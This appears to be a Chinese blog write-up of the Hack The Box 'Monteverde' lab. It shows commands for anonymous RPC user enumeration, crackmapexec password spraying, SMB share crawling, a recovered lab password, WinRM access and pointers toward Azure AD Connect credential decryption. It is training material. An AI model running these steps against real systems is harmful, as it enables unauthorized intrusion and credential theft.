HTB-Monteverde_azure ad exploit-优快云博客

本文链接：https://blog.youkuaiyun.com/2201_75378806/article/details/139373043

初始权限获得

rpcclient -U "" -N 10.10.10.172

rpcclient $> querydispinfo 得到用用户列表

把用户当作密码尝试一下爆破

crackmapexec smb 10.10.10.172 -u users -p users --continue-on-success

得到

利用

smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs

smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs -R 'users$' -R 递归user$列表下的所有文件

有一个文件位于\\10.10.10.172\mhope\azure.xml 可以尝试下载下来看一下

smbclient下载，查看里面有一个密码

~~4n0therD4y@n0th3r$~~

4n0therD4y@n0th3r$

该文件是在user目录下的由于该配置文件位于 mhope 目录下发现的，判断他是mhope的密码

crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$' 判断正确

Azure admin（云身份认证）

net user 该用户属于 *Azure Admins 组

还有很多与此相关的程序：

*Evil-WinRM* PS C:\Program Files> ls *Azure*

    Directory: C:\Program Files

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync

Azure Active Directory (Azure AD) 是 Microsoft 基于云的身份和访问管理服务。它是一个全面的身份和访问管理解决方案，提供强大的安全性、可扩展性以及与各种 Microsoft 和第三方服务的集成。Azure AD 是 Microsoft Azure 云平台的基本组件，广泛用于管理用户身份并实现对应用程序和资源的安全访问。

goole找exploit AD via azure

Azure AD Connect for Red Teamers - XPN InfoSec Blog

Azure AD Connect Database Exploit (Priv Esc) | VbScrub

Releases · VbScrub/AdSyncDecrypt · GitHub 工具

我对滥用 Azure 连接的粗糙理解

第一个，也可以说是最有趣的是密码哈希同步 (PHS)，它将用户帐户和密码哈希从 Active Directory 上传到 Azure。第二种方法是直通身份验证 (PTA)，它允许 Azure 将身份验证请求转发到本地 AD，而不是依赖上传哈希值。最后，我们有联合身份验证，这是我们已经见过无数次的传统 ADFS 部署。